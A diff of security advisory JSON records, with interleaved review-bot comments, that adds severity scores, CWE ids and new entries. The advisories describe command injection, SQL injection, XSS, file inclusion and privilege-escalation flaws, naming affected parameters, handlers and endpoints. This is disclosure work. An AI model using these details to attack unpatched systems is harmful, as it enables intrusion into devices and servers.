@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8p85-wjp4-3w4m", - "modified": "2026-02-20T18:31:40Z", + "modified": "2026-02-23T21:31:24Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26746" ], "details": "OpenSourcePOS 3.4.1 contains a Local File Inclusion (LFI) vulnerability in the Sales.php::getInvoice() function. An attacker can read arbitrary files on the web server by manipulating the Invoice Type configuration. This issue can be chained with the file upload functionality to achieve Remote Code Execution (RCE).", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-8x43-j6j7-q6vg/GHSA-8x43-j6j7-q6vg.json b/advisories/unreviewed/2026/02/GHSA-8x43-j6j7-q6vg/GHSA-8x43-j6j7-q6vg.json index 633222197720a..ce1d3350d15be 100644 --- a/advisories/unreviewed/2026/02/GHSA-8x43-j6j7-q6vg/GHSA-8x43-j6j7-q6vg.json +++ b/advisories/unreviewed/2026/02/GHSA-8x43-j6j7-q6vg/GHSA-8x43-j6j7-q6vg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8x43-j6j7-q6vg", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26723" ], "details": "Cross Site Scripting vulnerability in Key Systems Inc Global Facilities Management Software v. 20230721a allows a remote attacker to execute arbitrary code via the function parameter.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" + } + ], "affected": [], "references": [ { 
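Review bot: In GHSA-8p85-wjp4-3w4m the second hunk adds `"CWE-434"` as the only `cwe_ids` entry, but the `details` text describes a local file inclusion in `Sales.php::getInvoice()` and mentions file upload only as a chaining step. A CWE-based filter for file-inclusion or path-traversal weaknesses would miss this record. If the classification can be corrected upstream, the array should also carry the inclusion weakness, for example `"CWE-98"` next to `"CWE-434"`. Whether CWE-98 or CWE-22 is the better fit depends on how the invoice type reaches the include, which the advisory text does not show.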
@@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-9636-r3rx-jw83/GHSA-9636-r3rx-jw83.json b/advisories/unreviewed/2026/02/GHSA-9636-r3rx-jw83/GHSA-9636-r3rx-jw83.json index fc8140d0786e0..e3a31d70bde99 100644 --- a/advisories/unreviewed/2026/02/GHSA-9636-r3rx-jw83/GHSA-9636-r3rx-jw83.json +++ b/advisories/unreviewed/2026/02/GHSA-9636-r3rx-jw83/GHSA-9636-r3rx-jw83.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9636-r3rx-jw83", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-23T21:31:22Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2026-2736" ], "details": "Reflected Cross-site Scripting (XSS) in Alkacon's OpenCms v18.0, which allows an attacker to execute JavaScript code in the victim's browser by sending the victim a malicious URL containing the ‘q’ parameter in ‘/search/index.html’. This vulnerability can be exploited to steal sensitive user information such as session cookies, or to perform actions while impersonating the user.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-c4qg-fgx5-7xg5/GHSA-c4qg-fgx5-7xg5.json b/advisories/unreviewed/2026/02/GHSA-c4qg-fgx5-7xg5/GHSA-c4qg-fgx5-7xg5.json index 9e49477964163..181477942f31f 100644 --- a/advisories/unreviewed/2026/02/GHSA-c4qg-fgx5-7xg5/GHSA-c4qg-fgx5-7xg5.json +++ b/advisories/unreviewed/2026/02/GHSA-c4qg-fgx5-7xg5/GHSA-c4qg-fgx5-7xg5.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-c4qg-fgx5-7xg5", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26722" ], "details": "An issue in Key Systems Inc Global Facilities Management Software v.20230721a allows a remote attacker to escalate privileges via PIN component of the login functionality.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-269" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json b/advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json index 728e7288599ed..ad9f50279ae51 100644 --- a/advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json +++ b/advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json @@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-22" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json b/advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json index 9d5c56f007d84..f0da85e624ea5 100644 --- a/advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json +++ b/advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-f565-6pjw-3whr", - "modified": "2026-02-22T06:30:17Z", + "modified": "2026-02-23T21:31:25Z", "published": "2026-02-22T06:30:17Z", "aliases": [ "CVE-2026-1369" ], "details": "The Conditional CAPTCHA WordPress plugin through 4.0.0 does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-22T06:16:02Z" diff --git a/advisories/unreviewed/2026/02/GHSA-f8w4-9vp9-7v2q/GHSA-f8w4-9vp9-7v2q.json b/advisories/unreviewed/2026/02/GHSA-f8w4-9vp9-7v2q/GHSA-f8w4-9vp9-7v2q.json new file mode 100644 index 0000000000000..01ca14538bb16 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f8w4-9vp9-7v2q/GHSA-f8w4-9vp9-7v2q.json 
@@ -0,0 +1,37 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f8w4-9vp9-7v2q",
+ "modified": "2026-02-23T21:31:27Z",
+ "published": "2026-02-23T21:31:27Z",
+ "aliases": [
+ "CVE-2025-71056"
+ ],
+ "details": "Improper session management in GCOM EPON 1GE ONU version C00R371V00B01 allows attackers to execute a session hijacking attack via spoofing the IP address of an authenticated user.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71056"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/theShinigami/CVE-Disclosures/blob/main/CVE-2025-71056/README.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://johnbai.en.made-in-china.com/product/JXnENzmlJFpv/China-H18gn-Series-Gpon-Ont-ONU.html"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.szgcom.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T21:19:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fqqc-4836-hph4/GHSA-fqqc-4836-hph4.json b/advisories/unreviewed/2026/02/GHSA-fqqc-4836-hph4/GHSA-fqqc-4836-hph4.json
new file mode 100644
index 0000000000000..c3b6f82c90415
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fqqc-4836-hph4/GHSA-fqqc-4836-hph4.json
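Review bot: GHSA-f8w4-9vp9-7v2q is published with `"severity": []` and `"severity": null`, so the record carries no score at all; the same holds for GHSA-jqhg-j5gv-hpmr, GHSA-m6xw-mq4p-x7xv, GHSA-p884-v7p5-5858 and GHSA-p9m7-fwrr-649p later in this patch. The modified files in this same sync show scores being filled in several days after first publication, so a null here reads as not yet scored rather than low. Alerting or gating logic that compares against a severity threshold should handle `null` explicitly instead of treating it as below threshold. Two of these records describe command or argument injection on TOTOLINK devices.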
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fqqc-4836-hph4",
+ "modified": "2026-02-23T21:31:27Z",
+ "published": "2026-02-23T21:31:27Z",
+ "aliases": [
+ "CVE-2025-63946"
+ ],
+ "details": "A privilege escalation (PE) vulnerability in the Tencent PC Manager app thru 17.10.28554.205 on Windows devices enables a local user to execute programs with elevated privileges. However, execution requires that the local user is able to successfully exploit a race condition.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-63946"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/alexlee820/CVE-2025-63946-Tencent-PC-Manager-EoP/blob/main/README.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/alexlee820/Tencent-PC-Manager-EoP"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-59"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T20:28:53Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fqrw-hvqv-r58w/GHSA-fqrw-hvqv-r58w.json b/advisories/unreviewed/2026/02/GHSA-fqrw-hvqv-r58w/GHSA-fqrw-hvqv-r58w.json
index 7ef6368fe1d80..3f54f94f5270e 100644
--- a/advisories/unreviewed/2026/02/GHSA-fqrw-hvqv-r58w/GHSA-fqrw-hvqv-r58w.json
+++ b/advisories/unreviewed/2026/02/GHSA-fqrw-hvqv-r58w/GHSA-fqrw-hvqv-r58w.json
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-fqrw-hvqv-r58w", - "modified": "2026-02-20T18:31:40Z", + "modified": "2026-02-23T21:31:24Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26745" ], "details": "OpenSourcePOS 3.4.1 has a second order SQL Injection vulnerability in the handling of the currency_symbol configuration field. Although the input is initially stored without immediate execution, it is later concatenated into a dynamically constructed SQL query without proper sanitization or parameter binding. This allows an attacker with access to modify the currency_symbol value to inject arbitrary SQL expressions, which are executed when the affected query is subsequently processed.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json b/advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json index 7be7206499ed6..c41d63ba633ab 100644 --- a/advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json +++ b/advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-h2mx-ppvp-v2rq", - "modified": "2026-02-23T18:32:02Z", + "modified": "2026-02-23T21:31:26Z", "published": "2026-02-23T18:32:02Z", "aliases": [ "CVE-2025-70045" ], "details": "An issue pertaining to CWE-295: Improper Certificate Validation was discovered in jxcore jxm master. The application disables TLS/SSL certificate validation by setting 'rejectUnauthorized': false in HTTPS request options when 'jx_obj.IsSecure' is true", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-23T16:29:36Z" diff --git a/advisories/unreviewed/2026/02/GHSA-h4x3-hcxh-84cx/GHSA-h4x3-hcxh-84cx.json b/advisories/unreviewed/2026/02/GHSA-h4x3-hcxh-84cx/GHSA-h4x3-hcxh-84cx.json new file mode 100644 index 0000000000000..3235fce75e252 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h4x3-hcxh-84cx/GHSA-h4x3-hcxh-84cx.json 
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h4x3-hcxh-84cx",
+ "modified": "2026-02-23T21:31:27Z",
+ "published": "2026-02-23T21:31:27Z",
+ "aliases": [
+ "CVE-2025-70329"
+ ],
+ "details": "TOTOLink X5000R v9.1.0cu_2415_B20250515 contains an OS command injection vulnerability in the setIptvCfg handler of the /usr/sbin/lighttpd executable. The vlanVidLan1 (and other vlanVidLanX) parameters are retrieved via Uci_Get_Str and passed to the CsteSystem function without adequate validation or filtering. This allows an authenticated attacker to execute arbitrary shell commands with root privileges by injecting shell metacharacters into the affected parameters.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70329"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/neighborhood-H/0-DAY/blob/main/Toto-link/X5000R/SetIptvCfg/report.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.notion.so/TOTOLINK-X5000R-SetIptvCfg-2d170566ca7f8027ad47e6b5429025fc?source=copy_link"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T20:28:53Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json b/advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json
index bfd7ac10f2ae4..42c848ad80e26 100644
--- a/advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json
+++ b/advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-h93r-xq5m-hv3w", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:24Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26725" ], "details": "An issue in edu Business Solutions Print Shop Pro WebDesk v.18.34 allows a remote attacker to escalate privileges via the AccessID parameter.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-269" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-jqhg-j5gv-hpmr/GHSA-jqhg-j5gv-hpmr.json b/advisories/unreviewed/2026/02/GHSA-jqhg-j5gv-hpmr/GHSA-jqhg-j5gv-hpmr.json new file mode 100644 index 0000000000000..3a60b81243dc6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jqhg-j5gv-hpmr/GHSA-jqhg-j5gv-hpmr.json 
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jqhg-j5gv-hpmr",
+ "modified": "2026-02-23T21:31:27Z",
+ "published": "2026-02-23T21:31:27Z",
+ "aliases": [
+ "CVE-2025-70328"
+ ],
+ "details": "TOTOLINK X6000R v9.4.0cu.1498_B20250826 contains an OS command injection vulnerability in the NTPSyncWithHost handler of the /usr/sbin/shttpd executable. The host_time parameter is retrieved via sub_40C404 and passed to a date -s shell command through CsteSystem. While the first two tokens of the input are validated, the remainder of the string is not sanitized, allowing authenticated attackers to execute arbitrary shell commands via shell metacharacters.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70328"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/neighborhood-H/0-DAY/blob/main/Toto-link/X6000R/NTPSyncWihtHost/report.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.notion.so/TOTOLINK-X6000R-NTPSyncWithHost-2d170566ca7f803a8096c1b31b2ed42f?source=copy_link"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T21:19:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-m6xw-mq4p-x7xv/GHSA-m6xw-mq4p-x7xv.json b/advisories/unreviewed/2026/02/GHSA-m6xw-mq4p-x7xv/GHSA-m6xw-mq4p-x7xv.json
new file mode 100644
index 0000000000000..701e8553a46c4
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-m6xw-mq4p-x7xv/GHSA-m6xw-mq4p-x7xv.json
@@ -0,0 +1,45 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-m6xw-mq4p-x7xv",
+ "modified": "2026-02-23T21:31:26Z",
+ "published": "2026-02-23T21:31:26Z",
+ "aliases": [
+ "CVE-2025-61144"
+ ],
+ "details": "libtiff up to v4.7.1 was discovered to contain a stack overflow via the readSeparateStripsIntoBuffer function.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61144"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/optionGo/5ad17e96a0a40f03578dd6c9f8645952"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitlab.com/libtiff/libtiff/-/commit/09f53a86cf26dfd961925227e59e180db617f26d"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitlab.com/libtiff/libtiff/-/commit/88cf9dbb48f6e172629795ecffae35d5052f68aa"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitlab.com/libtiff/libtiff/-/issues/740"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitlab.com/libtiff/libtiff/-/merge_requests/757"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T19:22:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p5gf-vhgm-432f/GHSA-p5gf-vhgm-432f.json b/advisories/unreviewed/2026/02/GHSA-p5gf-vhgm-432f/GHSA-p5gf-vhgm-432f.json
index 728309edfa2e2..f06de64dd27e3 100644
--- a/advisories/unreviewed/2026/02/GHSA-p5gf-vhgm-432f/GHSA-p5gf-vhgm-432f.json
+++ b/advisories/unreviewed/2026/02/GHSA-p5gf-vhgm-432f/GHSA-p5gf-vhgm-432f.json
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-p5gf-vhgm-432f", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-23T21:31:22Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2025-15559" ], "details": "An unauthenticated attacker can inject OS commands when calling a server API endpoint in NesterSoft WorkTime. The server API call to generate and download the WorkTime client from the WorkTime server is vulnerable in the “guid” parameter. This allows an attacker to execute arbitrary commands on the WorkTime server as NT Authority\\SYSTEM with the highest privileges. Attackers are able to access or manipulate sensitive data and take over the whole server.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-78" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T11:15:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-p884-v7p5-5858/GHSA-p884-v7p5-5858.json b/advisories/unreviewed/2026/02/GHSA-p884-v7p5-5858/GHSA-p884-v7p5-5858.json new file mode 100644 index 0000000000000..d38c45d2cd16e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p884-v7p5-5858/GHSA-p884-v7p5-5858.json 
@@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p884-v7p5-5858", + "modified": "2026-02-23T21:31:26Z", + "published": "2026-02-23T21:31:26Z", + "aliases": [ + "CVE-2025-61143" + ], + "details": "libtiff up to v4.7.1 was discovered to contain a NULL pointer dereference via the component libtiff/tif_open.c.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61143" + }, + { + "type": "WEB", + "url": "https://gist.github.com/optionGo/9c024cd8e7b131463b84dc60af9bb0aa" + }, + { + "type": "WEB", + "url": "https://gitlab.com/libtiff/libtiff/-/issues/737" + }, + { + "type": "WEB", + "url": "https://gitlab.com/libtiff/libtiff/-/merge_requests/755" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T19:22:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p8m9-mjw8-hvvx/GHSA-p8m9-mjw8-hvvx.json b/advisories/unreviewed/2026/02/GHSA-p8m9-mjw8-hvvx/GHSA-p8m9-mjw8-hvvx.json index 4d6ff1e284dfc..43c601b6029c1 100644 --- a/advisories/unreviewed/2026/02/GHSA-p8m9-mjw8-hvvx/GHSA-p8m9-mjw8-hvvx.json +++ b/advisories/unreviewed/2026/02/GHSA-p8m9-mjw8-hvvx/GHSA-p8m9-mjw8-hvvx.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-p9m7-fwrr-649p/GHSA-p9m7-fwrr-649p.json b/advisories/unreviewed/2026/02/GHSA-p9m7-fwrr-649p/GHSA-p9m7-fwrr-649p.json new file mode 100644 index 0000000000000..6eda65c4b00c6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p9m7-fwrr-649p/GHSA-p9m7-fwrr-649p.json 
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p9m7-fwrr-649p",
+ "modified": "2026-02-23T21:31:27Z",
+ "published": "2026-02-23T21:31:27Z",
+ "aliases": [
+ "CVE-2025-70327"
+ ],
+ "details": "TOTOLINK X5000R v9.1.0cu_2415_B20250515 contains an argument injection vulnerability in the setDiagnosisCfg handler of the /usr/sbin/lighttpd executable. The ip parameter is retrieved via websGetVar and passed to a ping command through CsteSystem without validating if the input starts with a hyphen (-). This allows remote authenticated attackers to inject arbitrary command-line options into the ping utility, potentially leading to a Denial of Service (DoS) by causing excessive resource consumption or prolonged execution.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70327"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/neighborhood-H/0-DAY/blob/main/Toto-link/X5000R/SetDiagnosisCfg/report.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.notion.so/TOTOLINK-X5000R-SetDiagnosisCfg-2d170566ca7f8098a0bcee9f2a15d40d?source=copy_link"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T21:19:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pc7w-r272-4xgr/GHSA-pc7w-r272-4xgr.json b/advisories/unreviewed/2026/02/GHSA-pc7w-r272-4xgr/GHSA-pc7w-r272-4xgr.json
new file mode 100644
index 0000000000000..6f277458cb78d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pc7w-r272-4xgr/GHSA-pc7w-r272-4xgr.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pc7w-r272-4xgr",
+ "modified": "2026-02-23T21:31:27Z",
+ "published": "2026-02-23T21:31:27Z",
+ "aliases": [
+ "CVE-2026-23693"
+ ],
+ "details": "ElementsKit Lite (elementskit-lite) WordPress plugin versions prior to 3.7.9 expose the REST endpoint /wp-json/elementskit/v1/widget/mailchimp/subscribe without authentication. The endpoint accepts client-supplied Mailchimp API credentials and insufficiently validates certain parameters, including the list parameter, when constructing upstream Mailchimp API requests. An unauthenticated attacker can abuse the endpoint as an open proxy to Mailchimp, potentially triggering unauthorized API calls, manipulating subscription data, exhausting API quotas, or causing resource consumption on the affected WordPress site.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:H/SC:L/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23693"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wordpress.org/plugins/elementskit-lite"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wpmet.com/plugin/elementskit"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/elementskit-lite-unauthenticated-mailchimp-rest-endpoint"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-306"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T21:19:10Z"
+ }
+}
\ No newline at end of file
